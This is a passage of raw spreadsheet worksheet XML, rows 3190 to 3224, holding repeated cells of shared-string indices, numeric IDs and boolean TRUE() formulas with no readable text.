      </c>
      <c r="K3190">
        <v>0</v>
      </c>
      <c r="L3190" t="s">
        <v>81</v>
      </c>
      <c r="R3190" t="s">
        <v>115</v>
      </c>
      <c r="S3190" t="s">
        <v>3850</v>
      </c>
      <c r="T3190" t="s">
        <v>7</v>
      </c>
      <c r="U3190" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3191" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3191" s="1">
        <v>19559</v>
      </c>
      <c r="B3191" t="s">
        <v>0</v>
      </c>
      <c r="C3191" t="s">
        <v>22</v>
      </c>
      <c r="D3191" t="s">
        <v>3851</v>
      </c>
      <c r="E3191" t="s">
        <v>3848</v>
      </c>
      <c r="F3191">
        <v>4547713</v>
      </c>
      <c r="G3191" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3191" t="s">
        <v>3856</v>
      </c>
      <c r="K3191">
        <v>0</v>
      </c>
      <c r="L3191" t="s">
        <v>81</v>
      </c>
      <c r="R3191" t="s">
        <v>115</v>
      </c>
      <c r="S3191" t="s">
        <v>3850</v>
      </c>
      <c r="T3191" t="s">
        <v>7</v>
      </c>
      <c r="U3191" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3192" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3192" s="1">
        <v>19560</v>
      </c>
      <c r="B3192" t="s">
        <v>0</v>
      </c>
      <c r="C3192" t="s">
        <v>22</v>
      </c>
      <c r="D3192" t="s">
        <v>3851</v>
      </c>
      <c r="E3192" t="s">
        <v>3848</v>
      </c>
      <c r="F3192">
        <v>4547713</v>
      </c>
      <c r="G3192" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3192" t="s">
        <v>3857</v>
      </c>
      <c r="K3192">
        <v>0</v>
      </c>
      <c r="L3192" t="s">
        <v>81</v>
      </c>
      <c r="R3192" t="s">
        <v>115</v>
      </c>
      <c r="S3192" t="s">
        <v>3850</v>
      </c>
      <c r="T3192" t="s">
        <v>7</v>
      </c>
      <c r="U3192" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3193" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3193" s="1">
        <v>19561</v>
      </c>
      <c r="B3193" t="s">
        <v>0</v>
      </c>
      <c r="C3193" t="s">
        <v>22</v>
      </c>
      <c r="D3193" t="s">
        <v>3851</v>
      </c>
      <c r="E3193" t="s">
        <v>3848</v>
      </c>
      <c r="F3193">
        <v>4547713</v>
      </c>
      <c r="G3193" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3193" t="s">
        <v>3858</v>
      </c>
      <c r="K3193">
        <v>0</v>
      </c>
      <c r="L3193" t="s">
        <v>81</v>
      </c>
      <c r="R3193" t="s">
        <v>115</v>
      </c>
      <c r="S3193" t="s">
        <v>3850</v>
      </c>
      <c r="T3193" t="s">
        <v>7</v>
      </c>
      <c r="U3193" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3194" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3194" s="1">
        <v>19562</v>
      </c>
      <c r="B3194" t="s">
        <v>0</v>
      </c>
      <c r="C3194" t="s">
        <v>22</v>
      </c>
      <c r="D3194" t="s">
        <v>3851</v>
      </c>
      <c r="E3194" t="s">
        <v>3848</v>
      </c>
      <c r="F3194">
        <v>4547713</v>
      </c>
      <c r="G3194" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3194" t="s">
        <v>3859</v>
      </c>
      <c r="K3194">
        <v>0</v>
      </c>
      <c r="L3194" t="s">
        <v>81</v>
      </c>
      <c r="R3194" t="s">
        <v>115</v>
      </c>
      <c r="S3194" t="s">
        <v>3850</v>
      </c>
      <c r="T3194" t="s">
        <v>7</v>
      </c>
      <c r="U3194" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3195" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3195" s="1">
        <v>19563</v>
      </c>
      <c r="B3195" t="s">
        <v>0</v>
      </c>
      <c r="C3195" t="s">
        <v>22</v>
      </c>
      <c r="D3195" t="s">
        <v>3851</v>
      </c>
      <c r="E3195" t="s">
        <v>3848</v>
      </c>
      <c r="F3195">
        <v>4547713</v>
      </c>
      <c r="G3195" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3195" t="s">
        <v>3860</v>
      </c>
      <c r="K3195">
        <v>0</v>
      </c>
      <c r="L3195" t="s">
        <v>81</v>
      </c>
      <c r="R3195" t="s">
        <v>115</v>
      </c>
      <c r="S3195" t="s">
        <v>3850</v>
      </c>
      <c r="T3195" t="s">
        <v>7</v>
      </c>
      <c r="U3195" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3196" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3196" s="1">
        <v>19564</v>
      </c>
      <c r="B3196" t="s">
        <v>0</v>
      </c>
      <c r="C3196" t="s">
        <v>22</v>
      </c>
      <c r="D3196" t="s">
        <v>3851</v>
      </c>
      <c r="E3196" t="s">
        <v>3848</v>
      </c>
      <c r="F3196">
        <v>4547713</v>
      </c>
      <c r="G3196" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3196" t="s">
        <v>3861</v>
      </c>
      <c r="K3196">
        <v>0</v>
      </c>
      <c r="L3196" t="s">
        <v>81</v>
      </c>
      <c r="R3196" t="s">
        <v>115</v>
      </c>
      <c r="S3196" t="s">
        <v>3850</v>
      </c>
      <c r="T3196" t="s">
        <v>7</v>
      </c>
      <c r="U3196" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3197" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3197" s="1">
        <v>19565</v>
      </c>
      <c r="B3197" t="s">
        <v>0</v>
      </c>
      <c r="C3197" t="s">
        <v>22</v>
      </c>
      <c r="D3197" t="s">
        <v>3851</v>
      </c>
      <c r="E3197" t="s">
        <v>3848</v>
      </c>
      <c r="F3197">
        <v>4547713</v>
      </c>
      <c r="G3197" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3197" t="s">
        <v>3862</v>
      </c>
      <c r="K3197">
        <v>0</v>
      </c>
      <c r="L3197" t="s">
        <v>81</v>
      </c>
      <c r="R3197" t="s">
        <v>115</v>
      </c>
      <c r="S3197" t="s">
        <v>3850</v>
      </c>
      <c r="T3197" t="s">
        <v>7</v>
      </c>
      <c r="U3197" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3198" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3198" s="1">
        <v>19566</v>
      </c>
      <c r="B3198" t="s">
        <v>0</v>
      </c>
      <c r="C3198" t="s">
        <v>22</v>
      </c>
      <c r="D3198" t="s">
        <v>3851</v>
      </c>
      <c r="E3198" t="s">
        <v>3848</v>
      </c>
      <c r="F3198">
        <v>4547713</v>
      </c>
      <c r="G3198" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3198" t="s">
        <v>3863</v>
      </c>
      <c r="K3198">
        <v>0</v>
      </c>
      <c r="L3198" t="s">
        <v>81</v>
      </c>
      <c r="R3198" t="s">
        <v>115</v>
      </c>
      <c r="S3198" t="s">
        <v>3850</v>
      </c>
      <c r="T3198" t="s">
        <v>7</v>
      </c>
      <c r="U3198" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3199" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3199" s="1">
        <v>19567</v>
      </c>
      <c r="B3199" t="s">
        <v>0</v>
      </c>
      <c r="C3199" t="s">
        <v>22</v>
      </c>
      <c r="D3199" t="s">
        <v>3851</v>
      </c>
      <c r="E3199" t="s">
        <v>3848</v>
      </c>
      <c r="F3199">
        <v>4547713</v>
      </c>
      <c r="G3199" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3199" t="s">
        <v>3864</v>
      </c>
      <c r="K3199">
        <v>0</v>
      </c>
      <c r="L3199" t="s">
        <v>81</v>
      </c>
      <c r="R3199" t="s">
        <v>115</v>
      </c>
      <c r="S3199" t="s">
        <v>3850</v>
      </c>
      <c r="T3199" t="s">
        <v>7</v>
      </c>
      <c r="U3199" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3200" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3200" s="1">
        <v>19568</v>
      </c>
      <c r="B3200" t="s">
        <v>0</v>
      </c>
      <c r="C3200" t="s">
        <v>22</v>
      </c>
      <c r="D3200" t="s">
        <v>3851</v>
      </c>
      <c r="E3200" t="s">
        <v>3848</v>
      </c>
      <c r="F3200">
        <v>4547713</v>
      </c>
      <c r="G3200" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3200" t="s">
        <v>3865</v>
      </c>
      <c r="K3200">
        <v>0</v>
      </c>
      <c r="L3200" t="s">
        <v>81</v>
      </c>
      <c r="R3200" t="s">
        <v>115</v>
      </c>
      <c r="S3200" t="s">
        <v>3850</v>
      </c>
      <c r="T3200" t="s">
        <v>7</v>
      </c>
      <c r="U3200" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3201" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3201" s="1">
        <v>19569</v>
      </c>
      <c r="B3201" t="s">
        <v>0</v>
      </c>
      <c r="C3201" t="s">
        <v>22</v>
      </c>
      <c r="D3201" t="s">
        <v>3851</v>
      </c>
      <c r="E3201" t="s">
        <v>3848</v>
      </c>
      <c r="F3201">
        <v>4547713</v>
      </c>
      <c r="G3201" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3201" t="s">
        <v>3866</v>
      </c>
      <c r="K3201">
        <v>0</v>
      </c>
      <c r="L3201" t="s">
        <v>81</v>
      </c>
      <c r="R3201" t="s">
        <v>115</v>
      </c>
      <c r="S3201" t="s">
        <v>3850</v>
      </c>
      <c r="T3201" t="s">
        <v>7</v>
      </c>
      <c r="U3201" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3202" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3202" s="1">
        <v>19570</v>
      </c>
      <c r="B3202" t="s">
        <v>0</v>
      </c>
      <c r="C3202" t="s">
        <v>22</v>
      </c>
      <c r="D3202" t="s">
        <v>3851</v>
      </c>
      <c r="E3202" t="s">
        <v>3848</v>
      </c>
      <c r="F3202">
        <v>4547713</v>
      </c>
      <c r="G3202" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3202" t="s">
        <v>3867</v>
      </c>
      <c r="K3202">
        <v>0</v>
      </c>
      <c r="L3202" t="s">
        <v>81</v>
      </c>
      <c r="R3202" t="s">
        <v>115</v>
      </c>
      <c r="S3202" t="s">
        <v>3850</v>
      </c>
      <c r="T3202" t="s">
        <v>7</v>
      </c>
      <c r="U3202" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3203" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3203" s="1">
        <v>19571</v>
      </c>
      <c r="B3203" t="s">
        <v>0</v>
      </c>
      <c r="C3203" t="s">
        <v>22</v>
      </c>
      <c r="D3203" t="s">
        <v>3868</v>
      </c>
      <c r="E3203" t="s">
        <v>3848</v>
      </c>
      <c r="F3203">
        <v>4547712</v>
      </c>
      <c r="G3203" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3203" t="s">
        <v>3869</v>
      </c>
      <c r="K3203">
        <v>0</v>
      </c>
      <c r="L3203" t="s">
        <v>81</v>
      </c>
      <c r="R3203" t="s">
        <v>115</v>
      </c>
      <c r="S3203" t="s">
        <v>3850</v>
      </c>
      <c r="T3203" t="s">
        <v>7</v>
      </c>
      <c r="U3203" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3204" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3204" s="1">
        <v>19572</v>
      </c>
      <c r="B3204" t="s">
        <v>0</v>
      </c>
      <c r="C3204" t="s">
        <v>22</v>
      </c>
      <c r="D3204" t="s">
        <v>3868</v>
      </c>
      <c r="E3204" t="s">
        <v>3848</v>
      </c>
      <c r="F3204">
        <v>4547712</v>
      </c>
      <c r="G3204" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3204" t="s">
        <v>3870</v>
      </c>
      <c r="K3204">
        <v>0</v>
      </c>
      <c r="L3204" t="s">
        <v>81</v>
      </c>
      <c r="R3204" t="s">
        <v>115</v>
      </c>
      <c r="S3204" t="s">
        <v>3850</v>
      </c>
      <c r="T3204" t="s">
        <v>7</v>
      </c>
      <c r="U3204" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3205" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3205" s="1">
        <v>19573</v>
      </c>
      <c r="B3205" t="s">
        <v>0</v>
      </c>
      <c r="C3205" t="s">
        <v>22</v>
      </c>
      <c r="D3205" t="s">
        <v>3868</v>
      </c>
      <c r="E3205" t="s">
        <v>3848</v>
      </c>
      <c r="F3205">
        <v>4547712</v>
      </c>
      <c r="G3205" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3205" t="s">
        <v>3871</v>
      </c>
      <c r="K3205">
        <v>0</v>
      </c>
      <c r="L3205" t="s">
        <v>81</v>
      </c>
      <c r="R3205" t="s">
        <v>115</v>
      </c>
      <c r="S3205" t="s">
        <v>3850</v>
      </c>
      <c r="T3205" t="s">
        <v>7</v>
      </c>
      <c r="U3205" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3206" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3206" s="1">
        <v>19574</v>
      </c>
      <c r="B3206" t="s">
        <v>0</v>
      </c>
      <c r="C3206" t="s">
        <v>22</v>
      </c>
      <c r="D3206" t="s">
        <v>3868</v>
      </c>
      <c r="E3206" t="s">
        <v>3848</v>
      </c>
      <c r="F3206">
        <v>4547712</v>
      </c>
      <c r="G3206" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3206" t="s">
        <v>3872</v>
      </c>
      <c r="K3206">
        <v>0</v>
      </c>
      <c r="L3206" t="s">
        <v>81</v>
      </c>
      <c r="R3206" t="s">
        <v>115</v>
      </c>
      <c r="S3206" t="s">
        <v>3850</v>
      </c>
      <c r="T3206" t="s">
        <v>7</v>
      </c>
      <c r="U3206" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3207" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3207" s="1">
        <v>19575</v>
      </c>
      <c r="B3207" t="s">
        <v>0</v>
      </c>
      <c r="C3207" t="s">
        <v>22</v>
      </c>
      <c r="D3207" t="s">
        <v>3868</v>
      </c>
      <c r="E3207" t="s">
        <v>3848</v>
      </c>
      <c r="F3207">
        <v>4547712</v>
      </c>
      <c r="G3207" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3207" t="s">
        <v>3873</v>
      </c>
      <c r="K3207">
        <v>0</v>
      </c>
      <c r="L3207" t="s">
        <v>81</v>
      </c>
      <c r="R3207" t="s">
        <v>115</v>
      </c>
      <c r="S3207" t="s">
        <v>3850</v>
      </c>
      <c r="T3207" t="s">
        <v>7</v>
      </c>
      <c r="U3207" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3208" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3208" s="1">
        <v>19576</v>
      </c>
      <c r="B3208" t="s">
        <v>0</v>
      </c>
      <c r="C3208" t="s">
        <v>22</v>
      </c>
      <c r="D3208" t="s">
        <v>3868</v>
      </c>
      <c r="E3208" t="s">
        <v>3848</v>
      </c>
      <c r="F3208">
        <v>4547712</v>
      </c>
      <c r="G3208" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3208" t="s">
        <v>3874</v>
      </c>
      <c r="K3208">
        <v>0</v>
      </c>
      <c r="L3208" t="s">
        <v>81</v>
      </c>
      <c r="R3208" t="s">
        <v>115</v>
      </c>
      <c r="S3208" t="s">
        <v>3850</v>
      </c>
      <c r="T3208" t="s">
        <v>7</v>
      </c>
      <c r="U3208" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3209" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3209" s="1">
        <v>19577</v>
      </c>
      <c r="B3209" t="s">
        <v>0</v>
      </c>
      <c r="C3209" t="s">
        <v>22</v>
      </c>
      <c r="D3209" t="s">
        <v>3868</v>
      </c>
      <c r="E3209" t="s">
        <v>3848</v>
      </c>
      <c r="F3209">
        <v>4547712</v>
      </c>
      <c r="G3209" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3209" t="s">
        <v>3875</v>
      </c>
      <c r="K3209">
        <v>0</v>
      </c>
      <c r="L3209" t="s">
        <v>81</v>
      </c>
      <c r="R3209" t="s">
        <v>115</v>
      </c>
      <c r="S3209" t="s">
        <v>3850</v>
      </c>
      <c r="T3209" t="s">
        <v>7</v>
      </c>
      <c r="U3209" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3210" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3210" s="1">
        <v>19578</v>
      </c>
      <c r="B3210" t="s">
        <v>0</v>
      </c>
      <c r="C3210" t="s">
        <v>22</v>
      </c>
      <c r="D3210" t="s">
        <v>3868</v>
      </c>
      <c r="E3210" t="s">
        <v>3848</v>
      </c>
      <c r="F3210">
        <v>4547712</v>
      </c>
      <c r="G3210" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3210" t="s">
        <v>3876</v>
      </c>
      <c r="K3210">
        <v>0</v>
      </c>
      <c r="L3210" t="s">
        <v>81</v>
      </c>
      <c r="R3210" t="s">
        <v>115</v>
      </c>
      <c r="S3210" t="s">
        <v>3850</v>
      </c>
      <c r="T3210" t="s">
        <v>7</v>
      </c>
      <c r="U3210" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3211" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3211" s="1">
        <v>19579</v>
      </c>
      <c r="B3211" t="s">
        <v>0</v>
      </c>
      <c r="C3211" t="s">
        <v>22</v>
      </c>
      <c r="D3211" t="s">
        <v>3868</v>
      </c>
      <c r="E3211" t="s">
        <v>3848</v>
      </c>
      <c r="F3211">
        <v>4547712</v>
      </c>
      <c r="G3211" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3211" t="s">
        <v>3877</v>
      </c>
      <c r="K3211">
        <v>0</v>
      </c>
      <c r="L3211" t="s">
        <v>81</v>
      </c>
      <c r="R3211" t="s">
        <v>115</v>
      </c>
      <c r="S3211" t="s">
        <v>3850</v>
      </c>
      <c r="T3211" t="s">
        <v>7</v>
      </c>
      <c r="U3211" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3212" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3212" s="1">
        <v>19580</v>
      </c>
      <c r="B3212" t="s">
        <v>0</v>
      </c>
      <c r="C3212" t="s">
        <v>22</v>
      </c>
      <c r="D3212" t="s">
        <v>3868</v>
      </c>
      <c r="E3212" t="s">
        <v>3848</v>
      </c>
      <c r="F3212">
        <v>4547712</v>
      </c>
      <c r="G3212" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3212" t="s">
        <v>3878</v>
      </c>
      <c r="K3212">
        <v>0</v>
      </c>
      <c r="L3212" t="s">
        <v>81</v>
      </c>
      <c r="R3212" t="s">
        <v>115</v>
      </c>
      <c r="S3212" t="s">
        <v>3850</v>
      </c>
      <c r="T3212" t="s">
        <v>7</v>
      </c>
      <c r="U3212" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3213" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3213" s="1">
        <v>19581</v>
      </c>
      <c r="B3213" t="s">
        <v>0</v>
      </c>
      <c r="C3213" t="s">
        <v>22</v>
      </c>
      <c r="D3213" t="s">
        <v>3868</v>
      </c>
      <c r="E3213" t="s">
        <v>3848</v>
      </c>
      <c r="F3213">
        <v>4547712</v>
      </c>
      <c r="G3213" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3213" t="s">
        <v>3879</v>
      </c>
      <c r="K3213">
        <v>0</v>
      </c>
      <c r="L3213" t="s">
        <v>81</v>
      </c>
      <c r="R3213" t="s">
        <v>115</v>
      </c>
      <c r="S3213" t="s">
        <v>3850</v>
      </c>
      <c r="T3213" t="s">
        <v>7</v>
      </c>
      <c r="U3213" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3214" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3214" s="1">
        <v>19582</v>
      </c>
      <c r="B3214" t="s">
        <v>0</v>
      </c>
      <c r="C3214" t="s">
        <v>22</v>
      </c>
      <c r="D3214" t="s">
        <v>3868</v>
      </c>
      <c r="E3214" t="s">
        <v>3848</v>
      </c>
      <c r="F3214">
        <v>4547712</v>
      </c>
      <c r="G3214" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3214" t="s">
        <v>3880</v>
      </c>
      <c r="K3214">
        <v>0</v>
      </c>
      <c r="L3214" t="s">
        <v>81</v>
      </c>
      <c r="R3214" t="s">
        <v>115</v>
      </c>
      <c r="S3214" t="s">
        <v>3850</v>
      </c>
      <c r="T3214" t="s">
        <v>7</v>
      </c>
      <c r="U3214" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3215" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3215" s="1">
        <v>19583</v>
      </c>
      <c r="B3215" t="s">
        <v>0</v>
      </c>
      <c r="C3215" t="s">
        <v>22</v>
      </c>
      <c r="D3215" t="s">
        <v>3868</v>
      </c>
      <c r="E3215" t="s">
        <v>3848</v>
      </c>
      <c r="F3215">
        <v>4547712</v>
      </c>
      <c r="G3215" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3215" t="s">
        <v>3881</v>
      </c>
      <c r="K3215">
        <v>0</v>
      </c>
      <c r="L3215" t="s">
        <v>81</v>
      </c>
      <c r="R3215" t="s">
        <v>115</v>
      </c>
      <c r="S3215" t="s">
        <v>3850</v>
      </c>
      <c r="T3215" t="s">
        <v>7</v>
      </c>
      <c r="U3215" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3216" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3216" s="1">
        <v>19584</v>
      </c>
      <c r="B3216" t="s">
        <v>0</v>
      </c>
      <c r="C3216" t="s">
        <v>22</v>
      </c>
      <c r="D3216" t="s">
        <v>3868</v>
      </c>
      <c r="E3216" t="s">
        <v>3848</v>
      </c>
      <c r="F3216">
        <v>4547712</v>
      </c>
      <c r="G3216" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3216" t="s">
        <v>3882</v>
      </c>
      <c r="K3216">
        <v>0</v>
      </c>
      <c r="L3216" t="s">
        <v>81</v>
      </c>
      <c r="R3216" t="s">
        <v>115</v>
      </c>
      <c r="S3216" t="s">
        <v>3850</v>
      </c>
      <c r="T3216" t="s">
        <v>7</v>
      </c>
      <c r="U3216" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3217" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3217" s="1">
        <v>19585</v>
      </c>
      <c r="B3217" t="s">
        <v>0</v>
      </c>
      <c r="C3217" t="s">
        <v>22</v>
      </c>
      <c r="D3217" t="s">
        <v>3868</v>
      </c>
      <c r="E3217" t="s">
        <v>3848</v>
      </c>
      <c r="F3217">
        <v>4547712</v>
      </c>
      <c r="G3217" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3217" t="s">
        <v>3883</v>
      </c>
      <c r="K3217">
        <v>0</v>
      </c>
      <c r="L3217" t="s">
        <v>81</v>
      </c>
      <c r="R3217" t="s">
        <v>115</v>
      </c>
      <c r="S3217" t="s">
        <v>3850</v>
      </c>
      <c r="T3217" t="s">
        <v>7</v>
      </c>
      <c r="U3217" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3218" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3218" s="1">
        <v>19586</v>
      </c>
      <c r="B3218" t="s">
        <v>0</v>
      </c>
      <c r="C3218" t="s">
        <v>22</v>
      </c>
      <c r="D3218" t="s">
        <v>3868</v>
      </c>
      <c r="E3218" t="s">
        <v>3848</v>
      </c>
      <c r="F3218">
        <v>4547712</v>
      </c>
      <c r="G3218" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3218" t="s">
        <v>3884</v>
      </c>
      <c r="K3218">
        <v>0</v>
      </c>
      <c r="L3218" t="s">
        <v>81</v>
      </c>
      <c r="R3218" t="s">
        <v>115</v>
      </c>
      <c r="S3218" t="s">
        <v>3850</v>
      </c>
      <c r="T3218" t="s">
        <v>7</v>
      </c>
      <c r="U3218" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3219" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3219" s="1">
        <v>19587</v>
      </c>
      <c r="B3219" t="s">
        <v>0</v>
      </c>
      <c r="C3219" t="s">
        <v>22</v>
      </c>
      <c r="D3219" t="s">
        <v>3868</v>
      </c>
      <c r="E3219" t="s">
        <v>3848</v>
      </c>
      <c r="F3219">
        <v>4547712</v>
      </c>
      <c r="G3219" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3219" t="s">
        <v>3885</v>
      </c>
      <c r="K3219">
        <v>0</v>
      </c>
      <c r="L3219" t="s">
        <v>81</v>
      </c>
      <c r="R3219" t="s">
        <v>115</v>
      </c>
      <c r="S3219" t="s">
        <v>3850</v>
      </c>
      <c r="T3219" t="s">
        <v>7</v>
      </c>
      <c r="U3219" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3220" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3220" s="1">
        <v>19588</v>
      </c>
      <c r="B3220" t="s">
        <v>0</v>
      </c>
      <c r="C3220" t="s">
        <v>22</v>
      </c>
      <c r="D3220" t="s">
        <v>3868</v>
      </c>
      <c r="E3220" t="s">
        <v>3848</v>
      </c>
      <c r="F3220">
        <v>4547712</v>
      </c>
      <c r="G3220" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3220" t="s">
        <v>3886</v>
      </c>
      <c r="K3220">
        <v>0</v>
      </c>
      <c r="L3220" t="s">
        <v>81</v>
      </c>
      <c r="R3220" t="s">
        <v>115</v>
      </c>
      <c r="S3220" t="s">
        <v>3850</v>
      </c>
      <c r="T3220" t="s">
        <v>7</v>
      </c>
      <c r="U3220" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3221" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3221" s="1">
        <v>19589</v>
      </c>
      <c r="B3221" t="s">
        <v>0</v>
      </c>
      <c r="C3221" t="s">
        <v>22</v>
      </c>
      <c r="D3221" t="s">
        <v>3868</v>
      </c>
      <c r="E3221" t="s">
        <v>3848</v>
      </c>
      <c r="F3221">
        <v>4547712</v>
      </c>
      <c r="G3221" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3221" t="s">
        <v>3887</v>
      </c>
      <c r="K3221">
        <v>0</v>
      </c>
      <c r="L3221" t="s">
        <v>81</v>
      </c>
      <c r="R3221" t="s">
        <v>115</v>
      </c>
      <c r="S3221" t="s">
        <v>3850</v>
      </c>
      <c r="T3221" t="s">
        <v>7</v>
      </c>
      <c r="U3221" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3222" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3222" s="1">
        <v>19590</v>
      </c>
      <c r="B3222" t="s">
        <v>0</v>
      </c>
      <c r="C3222" t="s">
        <v>22</v>
      </c>
      <c r="D3222" t="s">
        <v>3868</v>
      </c>
      <c r="E3222" t="s">
        <v>3848</v>
      </c>
      <c r="F3222">
        <v>4547712</v>
      </c>
      <c r="G3222" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3222" t="s">
        <v>3888</v>
      </c>
      <c r="K3222">
        <v>0</v>
      </c>
      <c r="L3222" t="s">
        <v>81</v>
      </c>
      <c r="R3222" t="s">
        <v>115</v>
      </c>
      <c r="S3222" t="s">
        <v>3850</v>
      </c>
      <c r="T3222" t="s">
        <v>7</v>
      </c>
      <c r="U3222" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3223" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3223" s="1">
        <v>19591</v>
      </c>
      <c r="B3223" t="s">
        <v>0</v>
      </c>
      <c r="C3223" t="s">
        <v>22</v>
      </c>
      <c r="D3223" t="s">
        <v>3868</v>
      </c>
      <c r="E3223" t="s">
        <v>3848</v>
      </c>
      <c r="F3223">
        <v>4547712</v>
      </c>
      <c r="G3223" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3223" t="s">
        <v>3889</v>
      </c>
      <c r="K3223">
        <v>0</v>
      </c>
      <c r="L3223" t="s">
        <v>81</v>
      </c>
      <c r="R3223" t="s">
        <v>115</v>
      </c>
      <c r="S3223" t="s">
        <v>3850</v>
      </c>
      <c r="T3223" t="s">
        <v>7</v>
      </c>
      <c r="U3223" t="s">
        <v>2755</v>
      </c>
    </row>
    <row r="3224" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A3224" s="1">
        <v>19592</v>
      </c>
      <c r="B3224" t="s">
        <v>0</v>
      </c>
      <c r="C3224" t="s">
        <v>22</v>
      </c>
      <c r="D3224" t="s">
        <v>3868</v>
      </c>
      <c r="E3224" t="s">
        <v>3848</v>
      </c>
      <c r="F3224">
        <v>4547712</v>
      </c>
      <c r="G3224" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J3224" t="s">
        <v>3890</v>
      </c>
